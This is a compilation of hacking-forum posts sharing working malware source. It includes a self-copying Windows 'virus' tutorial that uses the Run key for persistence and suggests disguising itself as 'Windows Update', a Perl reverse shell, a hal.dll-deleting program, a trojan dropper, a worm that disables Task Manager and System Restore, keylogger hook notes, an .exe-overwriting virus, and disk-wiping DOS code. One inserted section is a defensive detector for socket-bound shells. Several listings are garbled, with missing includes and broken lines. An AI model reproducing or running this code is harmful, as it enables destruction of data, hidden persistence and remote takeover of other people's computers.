Now compile and run the code; nothing should happen (if a black window pops up, it means you didn't choose Win32). The reason nothing happened is that our program doesn't do anything: it runs and exits. We need to make it do something. First of all, add this code to the project in between the { } and before return 0;.

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);

Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project:
QUOTE
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);


Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should come up with a message box saying “Hello”.

Cool is it not? Ok time to explain how this works:

char system[MAX_PATH]; This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.

HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.

GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember, not everyone's Windows directory is c:\windows\system32. Mine is d:\winnt\system32 on this box. The reason for this is that we want to copy to an existing system32 directory.
strcat(system,”\\virus.exe”); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work!

CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for this tutorial).

Ok, that's it. Next we are going to add code so it will start up when the computer boots. We are going to use 3 API calls to accomplish this:
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey(); This closes the key

Time to add code to our fledgling virus:

QUOTE
HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);
Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.
The next call: hKey is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something less obviously like “Windows Update” or “Norton Security Shield” anyway be creative. The next zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is the size of the string, this is calculated automatically by using sizeof.

The next call closes the registry key.

Ok, add this to your code so it looks something like:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

return 0;
}

Now run your code, open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run; there should be a new key in the area to the right: our key!
Now comes the fun part of writing a virus the payload! This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.

Your code should now look like this with the payload attached:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

return 0;
}

Although small, don’t underestimate this payload; it is very annoying, try it. To fix your start bar, press Ctrl-Alt-Delete, find virus.exe and end the process. Then find explorer.exe and end it. Finally, while still in Task Manager, go to File > Run and type “explorer.exe” without the quotes. If that doesn’t work, change EnableWindow and ShowWindow to true instead of false; remember to change it back later, though.


Hacking Perl Script
I have used perl before I still don't entirely understand what this script does.

Perl Code:
#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:


Perl Code:
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:


Perl Code:
$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);


It essentially is forming a command to use with lynx. And yes, it is attempting to exec /bin/sh.

Ps: It'd be easy to read, if you terminate each line of code with a "\n" after the ";"
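
The script in the question sets `$0` to "lynx", connects a TCP socket to the host and port given on the command line, reopens STDIN, STDOUT and STDERR on that socket, and then runs `/bin/sh`. The following is an added defensive example, not part of the original thread: a Linux triage check that flags processes whose three standard descriptors all point at one socket, with an `argv[0]` mismatch as corroboration. The process snapshots in `SAMPLE` are constructed, and the helper names are assumptions of this example.

```python
import os
import re

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
SHELLS = {"sh", "bash", "dash", "ksh", "zsh"}  # assumption: shells present on the host


def snapshot(pid, proc_root="/proc"):
    """Collect exe path, argv[0] and stdio link targets for one PID (Linux)."""
    base = os.path.join(proc_root, str(pid))
    try:
        exe = os.readlink(os.path.join(base, "exe"))
        with open(os.path.join(base, "cmdline"), "rb") as fh:
            argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
        fds = {n: os.readlink(os.path.join(base, "fd", str(n))) for n in (0, 1, 2)}
    except OSError:
        return None  # process exited, or we lack permission to inspect it
    return {"pid": pid, "exe": exe, "argv0": argv0, "fds": fds}


def stdio_socket(snap):
    """Return the socket inode if fds 0, 1 and 2 all point at the same socket."""
    inodes = set()
    for n in (0, 1, 2):
        m = SOCKET_LINK.match(snap["fds"].get(n, ""))
        if not m:
            return None
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None


def classify(snap):
    """Return the reasons a process looks like a shell bound to a socket."""
    inode = stdio_socket(snap)
    if inode is None:
        return []
    reasons = [f"stdin/stdout/stderr all attached to socket inode {inode}"]
    exe_name = os.path.basename(snap["exe"])
    if exe_name in SHELLS:
        reasons.append(f"{exe_name} is a shell binary")
    # A rewritten process title ($0 = "lynx") shows up as argv[0] != executable.
    argv0_name = os.path.basename(snap["argv0"].lstrip("-"))
    if argv0_name and argv0_name != exe_name:
        reasons.append(f"argv[0] {snap['argv0']!r} does not match executable {exe_name}")
    return reasons


def scan(snapshots):
    """Map pid -> reasons for every snapshot that classify() flags."""
    hits = {}
    for snap in snapshots:
        if snap is None:
            continue
        reasons = classify(snap)
        if reasons:
            hits[snap["pid"]] = reasons
    return hits


def scan_live(proc_root="/proc"):
    """Run the same check against the local /proc (needs root to see all PIDs)."""
    pids = [int(d) for d in os.listdir(proc_root) if d.isdigit()]
    return scan(snapshot(pid, proc_root) for pid in pids)


# Constructed snapshots: an interpreter with a rewritten title and its child
# shell sharing one socket, a normal login shell on a terminal, and a daemon.
SAMPLE = [
    {"pid": 4101, "exe": "/usr/bin/perl", "argv0": "lynx",
     "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    {"pid": 4102, "exe": "/usr/bin/dash", "argv0": "sh",
     "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    {"pid": 2210, "exe": "/usr/bin/bash", "argv0": "-bash",
     "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    {"pid": 900, "exe": "/usr/sbin/rsyslogd", "argv0": "/usr/sbin/rsyslogd",
     "fds": {0: "/dev/null", 1: "/dev/null", 2: "socket:[1200]"}},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE).items():
        print(pid, "; ".join(reasons))
```

Services started by inetd-style supervisors legitimately run with socket-backed stdio, so treat a hit as a lead to correlate with the socket's remote endpoint, not as a verdict.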


Powerful C++ Virus
This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
C++ trojan dropper
CODE
#include
#include
#include
#include

void write(int mysize,char *tpath,char *mybuf)
{
int tsize = 0;
ifstream tfile(tpath,ios::binary);
tfile.seekg (0,ios::end);
tsize = tfile.tellg();
tfile.seekg (0,ios::beg);
char *tbuf = new char [tsize];
tfile.read(tbuf,tsize);
tfile.close();
ofstream outputfile(tpath,ios::binary);
outputfile.write(mybuf,mysize);
outputfile.write(tbuf,tsize);
outputfile.close();
cout<};

void extract(int mysize,char *target)
{
char windir[250];
GetWindowsDirectory(windir,MAX_PATH);
ifstream tfile(target,ios::binary);
tfile.seekg (213045);
int theamount = mysize - 213045;
char *tbuf = new char [theamount];
tfile.read(tbuf,theamount);
tfile.close();
char mypath[100];
strcpy (mypath,windir);
strcat (mypath,"\\command.exe");
ofstream outfile(mypath,ios::binary);
outfile.write(tbuf,theamount);
outfile.close();
cout<system(mypath);
};

int checkit(int mysize,char *mybuf,char *target)
{
int checker = 0;
char tpath[512];

if (mysize != 213045)
{
extract(mysize,target);
}
else
{
cout<<"pSyChIc - Dropper"<cout<<"Input file path"<cin>>tpath;
write (mysize,tpath,mybuf);
}
return 0;
};

int main(int argc, char *argv[])
{
long mysize;
char *target=argv[0];
ifstream myfile(argv[0],ios::binary);
myfile.seekg (0,ios::end);
mysize = myfile.tellg();
myfile.seekg (0,ios::beg);
char *mybuf= new char [mysize];
myfile.read(mybuf,mysize);
myfile.close();
checkit (mysize,mybuf,target);
return 0;
}
Trojan Dropper
Discovered: February 2, 2000
Updated: February 13, 2007 11:57:55 AM
Also Known As: Virus.Dropper, Trojan dropper
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


Trojan.Dropper is a Trojan horse that drops Trojan horses or back door Trojans onto compromised computers

Note: Definitions dated prior to 28th March 2005, may detect this threat as Trojan dropper.

C++ Worm
#include
#include
#include
#include
#include

char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance, LPSTR lpCmdLine, int

nCmdShow)
{
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] =

"C:\\Windows\\System32\\Wsecurity.exe";
if(RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\

Windows\\CurrentVersion\\Run",0,KEY_SET_VALU

E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(

HKEY_CURRENT_USER,"Software\\Microsoft\\Wi

ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,

&hKey2 );
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}

void restrictcleanwin()
{
ofstream Disable;


Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o

ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\

", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\Disable

RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\DisableT

askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\

\Windows\\CurrentVersion\\Policies\\System\\Disable

TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableConfig\", 1,

\"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableSR\", 1,

\"REG_DWORD\"" << endl;
Disable.close();
Sleep(3000);
ShellExecute(NULL, "open",

"C:\\WINDOWS\\WinDisable.vbs", NULL, NULL,

SW_HIDE);
}
void sshut()
{
ofstream fun1;
fun1.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Sshut.cmd",ios::out);
fun1 << "shutdown -s -t 5 -f -c \"Microsuck Windows

Corpration is crasher\" " << endl;
fun1.close();
}

void cdopen()
{
ofstream cdopen;
cdopen.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Cd-op.vbs",ios::out);
cdopen << "do" << endl;
cdopen << "wscript.sleep 100" << endl;
cdopen << "Set oWMP =

CreateObject(\"WMPlayer.OCX.7\")" << endl;
cdopen << "Set colCDROMs =

oWMP.cdromCollection" << endl;
cdopen << "if colCDROMs.Count then" << endl;
cdopen << "For i = 0 to colCDROMs.Count - 1" <<

endl;
cdopen << "colCDROMs.Item(i).Eject" << endl;
cdopen << "Next" << endl;
cdopen << "End If" << endl;
cdopen << "loop" << endl;
}
int main(int argc, char *argv[])
{
HWND wndstealth;
AllocConsole();
wndstealth=FindWindowA("ConsoleWindowClass",N

ULL);
ShowWindow(wndstealth,0);
restrictcleanwin();
sshut();
cdopen();
{

}
It is a program that drops a few files and edits the registry. All it does is shut down the computer every time it boots.
P.S. It's actually a worm not a virus


Trojan horse codes
1.log the keyboard typing

just to hook WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR and WM_KEYUP),hook the first one to log the eastern language characters(Chinese,Korean,etcs),and the others to log the english characters,nums,etcs.

2.hide the process's gui windows & taskbar

_ProcDlgMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax==WM_INITDIALOG
push hWnd
pop hWinMain
invoke SetWindowLong,hWnd,GWL_EXSTYLE,WS_EX_TOOLWINDOW ;
invoke SetWindowPos,hWinMain,HWND_BOTTOM,0,0,0,0,SWP_HIDEWINDOW ;

3.release & exec the trojan horse

....



.386
.model flat,stdcall
option casemap:none

include windows.inc
include kernel32.inc
includelib kernel32.lib

.data
@szTargetFileName db ‘Target.exe’,0
@hTargetFile dd ?
@hTargetFileMap dd ?
@lpTargetFile dd ?

FILE_REPLACE_OFFSET equ 00000H
FILE_REPLACE_SIZE equ 0A7B8H

.code
assume fs:nothing
start:

invoke CreateFile,addr @szTargetFileName,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax!=INVALID_HANDLE_VALUE
mov @hTargetFile,eax
.else
jmp _End
.endif
invoke CreateFileMapping,@hTargetFile,NULL,PAGE_READWRITE,0,0,NULL
.if eax
mov @hTargetFileMap,eax

invoke MapViewOfFile,@hTargetFileMap,FILE_MAP_WRITE,0,0,0
.if eax
mov @lpTargetFile,eax
jmp _Replace
.endif
invoke CloseHandle,@hTargetFileMap
.endif
jmp _End

_Replace:
mov eax,FILE_REPLACE_SIZE
mov ecx,@lpTargetFile
add ecx,FILE_REPLACE_OFFSET

invoke RtlZeroMemory,ecx,eax
invoke UnmapViewOfFile,@lpTargetFile
invoke CloseHandle,@hTargetFileMap
invoke CloseHandle,@hTargetFile
_End:
ret
end start

if u hav any problem understanding the codes .. u can google it..

c++ virus
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}
what it does
GetWindowsDirectoryA(windir, MAX_PATH)) + trace("GetWindowsDirectoryA ... + else { + char *p = strrchr(filename, '\\'); + if(p++) memmove(filename, p, ...
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) and here's the MFC generated one: ...
char pathname[256]; char windir[MAX_PATH]; char instpath[MAX_PATH]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); ...
GetModuleFileName(GetModH, Worm, sizeof(Worm)); GetWindowsDirectory(WinDir, sizeof(WinDir)); GetSystemDirectory(SysDir, sizeof(SysDir)); ...
strcat(windir, "\\System32\\viral.exe"); that is the virus.
unsigned char reg[10] = "infected"; RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); ...
RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); RegCloseKey(hKey); ...

.. i ve explained the codes and what they do.... in a short detail.... this will be very good for programmers.. nd a lil betta for begginers... just for each code.. ive given the code explanation.what it does.. or what it is..
overwrite virus coded in C
It is a overwrite virus written ic C .When u run this program ,the program will overwrite all the exe files present in the current directory and the parent directory
Code :
/*A virus program
coded by SJ

email id:samjohnyb4u@gmail.com
*/
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst("*.exe",f,0);
while(!done)
{
virus=fopen(argv[0],"rb");//open the virus in read mode
host=fopen(f->ff_name,"rb+");//open the host file in r/w mode

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf("infecting %s
",f->ff_name);
done=findnext(f);
}
}
while(!chdir(".."));
printf("For any querry contact
SJ in Disguise
,id:samjohnyb4u@gmail.com");


Virus (Mini project)
its a simply jokeCode :


//***************************************************************//
//virus program-created by SJ//

//**************************************************************//

#include
#include
#include
#include
#include
#include
#include

void fool();
void main()
{
clrscr();
for(int i=0;i<=100;i++)
{

textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf("VIRUS LOADING");
gotoxy(39,15);
textcolor(GREEN);
cout<delay(75);
clrscr();
}
delay(100);
clrscr();
flushall();
gotoxy(20,12);
cout<<" 'AISHWARYA' VIRUS CREATED NOW BY SJ";
gotoxy(20,14);
cout<<"SAY GOOD BYE TO YOUR PC IN ";
for(int j=10;j>=0;j--)
{
gotoxy(48,14);
cout<delay(1000);
}
clrscr();
cout<<"
1.HARD-DISK CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

2.MOTHER BOARD CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND :";
delay(4000);
cout<<"completed";
cout<<"

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
cout<<"

VIRUS.EXE";
delay(2000);
cout<<"
*************************";
cout<<"
Buddy it's a simply joke ";
cout<<"
*************************";
delay(4000);
cout<<"


**********************************";
cout<<"
For Real Virus ";
cout<<"
Contact Me: SJ";
cout<<"
Mo: 010101010101 ";
cout<<"
Email: samjohnyb4u@gmail.com";
cout<<"
**********************************";
delay(10000);
}

void fool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,"c:\tc\bgi");
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
getch();
delay(4000);
closegraph();
exit(0);
}
VIRUS Designing - Use responsibly
#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

//#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

The HITLER virus
The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.

make sure u dont misuse it.. the code is totaly big so i am uploading it as txt file.. u can scan it.. txt file dosent prove nything.. lolzzz

Download:
hxxp://rapidshare.com/files/65139588/Hitler.txt

Bomber Virus
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}



Virus
Program Wipe_The_Fuckers_HD;
uses dos,crt;
var read:string;

Begin
clrscr;
inline ($B0/$08/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {I:}
write ('.');
inline ($B0/$09/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {j:}
write ('.');
inline ($B0/$07/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {H:}
write ('.');
inline ($B0/$06/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {G:}
write ('.');
inline ($B0/$05/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {F:}
write ('.');
inline ($B0/$04/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {E:}
write ('.');
inline ($B0/$03/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {D:}
write ('.');
inline ($B0/$02/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {C:}
write ('.');
inline ($B0/$01/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {B:}
write ('.');
inline ($B0/$00/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {A:}
writeln;
textcolor (14);
Writeln ('FUCK OFF');
Writeln('');
Writeln('');
textcolor (13);
textcolor (12);
textcolor (11);
Writeln('');
sound(500);

End.

This is a live trojan tarball Backdoor

Batch Virus
Whoever thought that viruses could be in BATCH files? This virus which
we are about to see makes use of the MS-DOS operating system. This BATCH
virus uses DEBUG & EDLIN programs.
NAME: VR.BAT

ECHO = OFF (Self explanatory)
CTTY NUL (This is important. Console output is turned off)
PATH C:\MSDOS (May differ on other systems)
DIR *.COM/W>IND (The directory is written on "ind" ONLY name entries)
EDLIN IND<1 ("ind" is processed with EDLIN so only file names appear)
DEBUG IND<2 (New batch program is created with debug)
EDLIN NAME.BAT<3 (This batch goes to an executable form because of EDLIN)
CTTY CON (Console interface is again assigned)
NAME (Newly created NAME.BAT is called)

In addition to this Batch file, there are command files, here named 1,2,3.
Here is the first command file:

NAME: 1

1,4D (Here line 1-4 of the "ind" file are deleted)
E (Save file)

Here is the second command file:

NAME: 2

M100,10B,F000 (First program name is moved to the F000H address to save)
E108".BAT" (Extension of file name is changed to .BAT)
M100,10B,F010 (File is saved again)
E100"DEL" (DEL Command is written to address 100H)
MF000,F00B,104 (Original file is written after this command)
E10C 2E (Period is placed in front of extension)
E110 0D,0A (Carriage return plus line feed)
MF010,F020,11F (Modified file is moved to 11FH address from buffer area)
E112"COPY\VR.BAT" (Copy command is now placed in front of file)
E12B 0D,0A (Copy command terminated with carriage return + line feed)
RXC (The CX register is ...)
2C (Set to 2CH)
NNAME.BAT (Name it NAME.BAT)
W (Write)
Q (Quit) The third command file must be printed as a hex dump because it contains
two control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
NAME: 3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root. This
Program only affects .COM files.

Start: Jmp MainVir
Db '*'

MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
